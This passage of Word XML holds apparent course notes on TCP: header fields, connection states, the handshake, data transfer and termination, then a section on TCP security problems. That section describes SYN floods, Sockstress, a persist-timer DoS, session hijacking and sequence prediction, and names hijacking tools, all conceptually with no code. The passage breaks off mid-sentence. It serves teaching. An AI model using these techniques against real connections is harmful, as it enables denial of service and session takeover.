            <w:r w:rsidRPr="004746B3">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:br/>
              <w:t>N</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Window Size</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128</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Checksum</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Urgent pointer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160</w:t>
            </w:r>
            <w:r w:rsidRPr="004746B3">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:br/>
              <w:t>...</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Options (if Data Offset &gt; 5)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="004746B3" w:rsidRPr="00D1486B" w:rsidRDefault="004746B3" w:rsidP="00335CD8">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D85814" w:rsidRPr="00D1486B" w:rsidRDefault="004746B3" w:rsidP="00335CD8">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Protocol Operation:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004746B3" w:rsidRPr="00D1486B" w:rsidRDefault="004746B3" w:rsidP="004746B3">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>TCP protocol operations may be divided into three phases. Connections must be properly established in a multi-step handshake process (connection establishment) before entering the data transfer phase. After data transmission is completed, the connection termination closes established virtual circuits and releases all allocated resources.</w:t>
      </w:r>
      <w:r w:rsidR="00CE2955" w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> The following state changes are maintained by the OS:</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LISTEN</w:t>
      </w:r>
      <w:r w:rsidR="004746B3" w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="004746B3" w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">In case of a server, waiting for a connection request from any remote client.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SYN-SENT</w:t>
      </w:r>
      <w:r w:rsidR="004746B3" w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="004746B3" w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">waiting for the remote peer to send back a TCP segment with the SYN and ACK flags set. (usually set by TCP clients)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SYN-RECEIVED</w:t>
      </w:r>
      <w:r w:rsidR="004746B3" w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">: waiting for the remote peer to send back an acknowledgment after having sent back a connection acknowledgment to the remote peer. (usually set by TCP servers)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ESTABLISHED</w:t>
      </w:r>
      <w:r w:rsidR="004746B3" w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">: the port is ready to receive/send data from/to the remote peer.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FIN-WAIT-1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FIN-WAIT-2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CLOSE-WAIT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CLOSING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LAST-ACK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TIME-WAIT</w:t>
      </w:r>
      <w:r w:rsidR="004746B3" w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">: represents waiting for enough time to pass to be sure the remote peer received the acknowledgment of its connection termination request. According to RFC 793 a connection can stay in TIME-WAIT for a maximum of four minutes.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CLOSED</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D85814" w:rsidRPr="00D1486B" w:rsidRDefault="00D85814" w:rsidP="00335CD8">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D85814" w:rsidRPr="00D1486B" w:rsidRDefault="00CE2955" w:rsidP="00335CD8">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Connection Establishment:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE2955" w:rsidRPr="00D1486B" w:rsidRDefault="00CE2955" w:rsidP="00CE2955">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>To establish a TCP connection, the three-way (or 3-step) handshake occurs:</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SYN  </w:t>
      </w:r>
      <w:r w:rsidR="006E37F8" w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> SYN </w:t>
      </w:r>
      <w:r w:rsidR="006E37F8" w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">is sent to the server with </w:t>
      </w:r>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">number to a random value A. </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SYN ACK  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="006E37F8" w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>erver replies with a SYN-ACK</w:t>
      </w:r>
      <w:r w:rsidR="006E37F8" w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> with</w:t>
      </w:r>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> acknowledgment number is set (A + 1), and the sequence number that the server chooses for the packet is another random number, B. </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ACK </w:t>
      </w:r>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="006E37F8" w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lient sends an ACK back to the server. The sequence number is set to the received acknowledgement value i.e. A + 1, and the acknowledgement number is set to one more than the received sequence number i.e. B + 1.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE2955"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Data transfer:</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lastRenderedPageBreak/>
        <w:t>Ordered data transfer - the destination host rearranges according to sequence number.</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Retransmission of lost packets - any cumulative stream not acknowledged will be retransmitted.</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 xml:space="preserve">Discarding duplicate packets </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Error-free data transfer – checksum of the segment must be correct</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Flow control - limits the rate a sender transfers data to guarantee reliable delivery. The receiver continually hints the sender on how much data can be received (controlled by the sliding window). When the receiving host's buffer fills, the next acknowledgment contains a 0 in the window size, to stop transfer and allow the data in the buffer to be processed.</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Congestion control</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006E37F8" w:rsidRPr="00D1486B" w:rsidRDefault="006E37F8" w:rsidP="00335CD8">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006E37F8"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Connection termination:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006E37F8" w:rsidRPr="00D1486B" w:rsidRDefault="006E37F8" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>A FIN is send from one side and the remote side responds with and ACK closing one side of the connection. This sequence is also completed by the other side of the connection so the resulting process is a four-way handshake.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF10B8" w:rsidRPr="00D1486B" w:rsidRDefault="00DF10B8" w:rsidP="00335CD8">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006E37F8"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TCP Security Problems:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C392B" w:rsidRPr="00D1486B" w:rsidRDefault="00DF10B8" w:rsidP="000C392B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>Denial of service</w:t>
      </w:r>
      <w:r w:rsidR="000C392B" w:rsidRPr="00D1486B">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C392B" w:rsidRPr="00D1486B" w:rsidRDefault="000C392B" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>SYN Flood</w:t>
      </w:r>
      <w:r w:rsidR="00D17DB0" w:rsidRPr="00D1486B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C392B" w:rsidRPr="00D1486B" w:rsidRDefault="00DF10B8" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">By using a spoofed IP address and repeatedly sending purposely assembled SYN packets, attackers can cause the server to consume large amounts of resources keeping track of the bogus connections. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D17DB0" w:rsidRPr="00D1486B" w:rsidRDefault="00DF10B8" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Proposed solutions to this problem include SYN cookies and Cryptographic puzzles. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D17DB0" w:rsidRPr="00D1486B" w:rsidRDefault="00DF10B8" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Sockstress is </w:t>
      </w:r>
      <w:r w:rsidR="00A81124" w:rsidRPr="00D1486B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>a similar attack</w:t>
      </w:r>
      <w:r w:rsidR="00A81124">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> that is new, fairly unpublished, and</w:t>
      </w:r>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> against which no defense is yet known</w:t>
      </w:r>
      <w:r w:rsidR="00A81124">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:hyperlink r:id="rId25" w:history="1">
        <w:r w:rsidR="00D17DB0" w:rsidRPr="00D1486B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:lang w:eastAsia="en-GB"/>
          </w:rPr>
          <w:t>http://en.wikipedia.org/wiki/Sockstress</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00A81124">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00D17DB0" w:rsidRPr="00D1486B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF10B8" w:rsidRPr="00D1486B" w:rsidRDefault="00D17DB0" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">TCP Persistant Timer DOS </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">-  </w:t>
      </w:r>
      <w:r w:rsidR="00A81124">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="00DF10B8" w:rsidRPr="00D1486B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>dvanced</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00DF10B8" w:rsidRPr="00D1486B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> DoS attack involving the exploitation of the TCP Persist Timer was analyzed at Phrack #66</w:t>
      </w:r>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:hyperlink r:id="rId26" w:anchor="article" w:history="1">
        <w:r w:rsidR="00D1486B" w:rsidRPr="003E0EC9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:lang w:eastAsia="en-GB"/>
          </w:rPr>
          <w:t>http://phrack.org/issues.html?issue=66&amp;id=9#article</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00DF10B8" w:rsidRPr="00D1486B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D17DB0" w:rsidRPr="00D1486B" w:rsidRDefault="00D17DB0" w:rsidP="000C392B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D17DB0" w:rsidRPr="00A81124" w:rsidRDefault="00DF10B8" w:rsidP="000C392B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>Connection hijacking</w:t>
      </w:r>
      <w:r w:rsidR="00D1486B">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D1486B" w:rsidRPr="00D1486B" w:rsidRDefault="00DF10B8" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">An attacker who is able to </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>eavesdrop</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> a TCP session and redirect packets can hijack a TCP connection. To do so, the attacker learns the sequence number from the ongoing communication and forges a false segment that looks like the next segment in the stream. Such a simple hijack can result in one packet being erroneously accepted at one end. When the receiving host acknowledges the extra segment to the other side of the conn</w:t>
      </w:r>
      <w:r w:rsidR="00D1486B" w:rsidRPr="00D1486B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>ection, synchronization is lost.</w:t>
      </w:r>
      <w:r w:rsidR="00D1486B" w:rsidRPr="00D1486B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D1486B" w:rsidRPr="00D1486B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>Hijacking might be combined with ARP or routing attacks that allow taking control of the packet flow, so as to get permanent control of the hijacked TCP connection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A81124" w:rsidRPr="00886581" w:rsidRDefault="00D1486B" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:rPr>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">TCP sequence prediction attack - </w:t>
      </w:r>
      <w:r w:rsidR="00DF10B8" w:rsidRPr="00D1486B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Impersonating a different IP address was possible prior to RFC 1948, when the initial </w:t>
      </w:r>
      <w:r w:rsidR="00DF10B8" w:rsidRPr="00D1486B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>sequence number</w:t>
      </w:r>
      <w:r w:rsidR="00DF10B8" w:rsidRPr="00D1486B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> was easily guessable. That allowed an attacker to blindly send a sequence of packets that the receiver would believe to come from a different IP address, without the need to deploy ARP or routing attacks: it is enough to ensure that the legitimate host of the impersonated IP address is down, or bring it to that condition using denial of service attacks. This is why the initial sequence number is chosen at random.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00886581" w:rsidRPr="00A81124" w:rsidRDefault="00886581" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:rPr>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00886581">
        <w:rPr>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Hunt and juggernaut tools can be used to hijack </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00886581">
        <w:rPr>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>tcp/ip</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00886581">
        <w:rPr>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
